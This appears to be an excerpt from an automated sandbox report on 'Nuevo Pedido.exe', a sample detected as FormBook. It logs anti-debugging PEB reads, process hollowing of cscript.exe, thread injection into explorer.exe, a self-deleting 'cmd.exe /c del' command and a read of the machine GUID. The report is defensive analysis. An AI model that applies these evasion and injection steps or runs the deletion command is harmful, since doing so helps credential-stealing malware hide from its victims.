Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047AF0BF mov ecx, dword ptr fs:[00000030h] 16_2_047AF0BF
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047AF0BF mov eax, dword ptr fs:[00000030h] 16_2_047AF0BF
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047AF0BF mov eax, dword ptr fs:[00000030h] 16_2_047AF0BF
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B90AF mov eax, dword ptr fs:[00000030h] 16_2_047B90AF
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h] 16_2_047A20A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h] 16_2_047A20A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h] 16_2_047A20A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h] 16_2_047A20A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h] 16_2_047A20A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h] 16_2_047A20A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04832073 mov eax, dword ptr fs:[00000030h] 16_2_04832073
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04841074 mov eax, dword ptr fs:[00000030h] 16_2_04841074
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04779080 mov eax, dword ptr fs:[00000030h] 16_2_04779080
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F3884 mov eax, dword ptr fs:[00000030h] 16_2_047F3884
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F3884 mov eax, dword ptr fs:[00000030h] 16_2_047F3884
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477B171 mov eax, dword ptr fs:[00000030h] 16_2_0477B171
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477B171 mov eax, dword ptr fs:[00000030h] 16_2_0477B171
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477C962 mov eax, dword ptr fs:[00000030h] 16_2_0477C962
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0479B944 mov eax, dword ptr fs:[00000030h] 16_2_0479B944
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0479B944 mov eax, dword ptr fs:[00000030h] 16_2_0479B944
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A513A mov eax, dword ptr fs:[00000030h] 16_2_047A513A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A513A mov eax, dword ptr fs:[00000030h] 16_2_047A513A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04794120 mov eax, dword ptr fs:[00000030h] 16_2_04794120
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04794120 mov eax, dword ptr fs:[00000030h] 16_2_04794120
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04794120 mov eax, dword ptr fs:[00000030h] 16_2_04794120
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04794120 mov eax, dword ptr fs:[00000030h] 16_2_04794120
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04794120 mov ecx, dword ptr fs:[00000030h] 16_2_04794120
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_048041E8 mov eax, dword ptr fs:[00000030h] 16_2_048041E8
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04779100 mov eax, dword ptr fs:[00000030h] 16_2_04779100
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04779100 mov eax, dword ptr fs:[00000030h] 16_2_04779100
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04779100 mov eax, dword ptr fs:[00000030h] 16_2_04779100
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477B1E1 mov eax, dword ptr fs:[00000030h] 16_2_0477B1E1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477B1E1 mov eax, dword ptr fs:[00000030h] 16_2_0477B1E1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477B1E1 mov eax, dword ptr fs:[00000030h] 16_2_0477B1E1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F51BE mov eax, dword ptr fs:[00000030h] 16_2_047F51BE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F51BE mov eax, dword ptr fs:[00000030h] 16_2_047F51BE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F51BE mov eax, dword ptr fs:[00000030h] 16_2_047F51BE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F51BE mov eax, dword ptr fs:[00000030h] 16_2_047F51BE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F69A6 mov eax, dword ptr fs:[00000030h] 16_2_047F69A6
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A61A0 mov eax, dword ptr fs:[00000030h] 16_2_047A61A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A61A0 mov eax, dword ptr fs:[00000030h] 16_2_047A61A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A2990 mov eax, dword ptr fs:[00000030h] 16_2_047A2990
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0479C182 mov eax, dword ptr fs:[00000030h] 16_2_0479C182
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047AA185 mov eax, dword ptr fs:[00000030h] 16_2_047AA185
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B927A mov eax, dword ptr fs:[00000030h] 16_2_047B927A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04779240 mov eax, dword ptr fs:[00000030h] 16_2_04779240
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04779240 mov eax, dword ptr fs:[00000030h] 16_2_04779240
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04779240 mov eax, dword ptr fs:[00000030h] 16_2_04779240
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04779240 mov eax, dword ptr fs:[00000030h] 16_2_04779240
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B4A2C mov eax, dword ptr fs:[00000030h] 16_2_047B4A2C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B4A2C mov eax, dword ptr fs:[00000030h] 16_2_047B4A2C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477AA16 mov eax, dword ptr fs:[00000030h] 16_2_0477AA16
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477AA16 mov eax, dword ptr fs:[00000030h] 16_2_0477AA16
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04793A1C mov eax, dword ptr fs:[00000030h] 16_2_04793A1C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04775210 mov eax, dword ptr fs:[00000030h] 16_2_04775210
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04775210 mov ecx, dword ptr fs:[00000030h] 16_2_04775210
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04775210 mov eax, dword ptr fs:[00000030h] 16_2_04775210
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04775210 mov eax, dword ptr fs:[00000030h] 16_2_04775210
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04788A0A mov eax, dword ptr fs:[00000030h] 16_2_04788A0A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A2AE4 mov eax, dword ptr fs:[00000030h] 16_2_047A2AE4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A2ACB mov eax, dword ptr fs:[00000030h] 16_2_047A2ACB
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478AAB0 mov eax, dword ptr fs:[00000030h] 16_2_0478AAB0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478AAB0 mov eax, dword ptr fs:[00000030h] 16_2_0478AAB0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047AFAB0 mov eax, dword ptr fs:[00000030h] 16_2_047AFAB0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047752A5 mov eax, dword ptr fs:[00000030h] 16_2_047752A5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047752A5 mov eax, dword ptr fs:[00000030h] 16_2_047752A5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047752A5 mov eax, dword ptr fs:[00000030h] 16_2_047752A5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047752A5 mov eax, dword ptr fs:[00000030h] 16_2_047752A5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047752A5 mov eax, dword ptr fs:[00000030h] 16_2_047752A5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0483EA55 mov eax, dword ptr fs:[00000030h] 16_2_0483EA55
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04804257 mov eax, dword ptr fs:[00000030h] 16_2_04804257
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0482B260 mov eax, dword ptr fs:[00000030h] 16_2_0482B260
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\cscript.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_00409B40 LdrLoadDll, 3_2_00409B40
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: A50000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread register set: target process: 3472
Source: C:\Windows\SysWOW64\cscript.exe Thread register set: target process: 3472
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process created: C:\Users\user\Desktop\Nuevo Pedido.exe C:\Users\user\Desktop\Nuevo Pedido.exe
Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Nuevo Pedido.exe"

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Queries volume information: C:\Users\user\Desktop\Nuevo Pedido.exe VolumeInformation
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook

Remote Access Functionality:

Yara detected FormBook